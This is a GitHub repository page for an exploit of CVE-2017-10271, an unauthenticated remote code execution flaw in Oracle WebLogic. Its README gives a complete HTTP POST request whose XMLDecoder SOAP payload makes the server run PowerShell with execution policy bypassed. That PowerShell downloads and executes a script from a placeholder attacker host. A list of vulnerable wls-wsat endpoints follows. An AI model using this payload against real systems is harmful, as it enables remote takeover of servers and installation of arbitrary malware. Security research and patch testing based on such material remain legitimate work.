Skip to content

c0mmand3rOpSec/CVE-2017-10271

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits

README.md

README.md

 
 

exploit.py

exploit.py

 
 

payloads.py

payloads.py

 
 

scanner.sh

scanner.sh

 
 

weblogic.py

weblogic.py

 
 

Repository files navigation

CVE-2017-10271 identification and exploitation. Unauthenticated Weblogic RCE.

https://nvd.nist.gov/vuln/detail/CVE-2017-10271

https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: SOMEHOSTHERE
Content-Length: 1226
content-type: text/xml
Accept-Encoding: gzip, deflate, compress
Accept: */*
User-Agent: python-requests/2.2.1 CPython/2.7.6 Linux/3.19.0-25-generic

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
	<soapenv:Header>
		<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
			<java version="1.8.0_151" class="java.beans.XMLDecoder"> 
			<void class="java.lang.ProcessBuilder"> 
				<array class="java.lang.String" length="3">
				<void index = "0">
					<string>cmd</string>
				</void>
				<void index = "1"> 
					<string>/c</string> 
				</void>
				<void index = "2">
					<string>powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString(&apos;http://SOMESERVERHERE/GOTPAYLOAD.ps1&apos;)</string>
				</void>
			</array>
			<void method="start"/>
			</void>
			</java>
			</work:WorkContext> 
	</soapenv:Header> 
<soapenv:Body/>
</soapenv:Envelope>

wls-wsat endpoint list

CoordinatorPortType
RegistrationPortTypeRPC
ParticipantPortType
RegistrationRequesterPortType
CoordinatorPortType11
RegistrationPortTypeRPC11
ParticipantPortType11
RegistrationRequesterPortType11

About

WebLogic Exploit

Resources

Readme
Activity

Stars

142 stars

Watchers

9 watching

Forks

46 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 3

Languages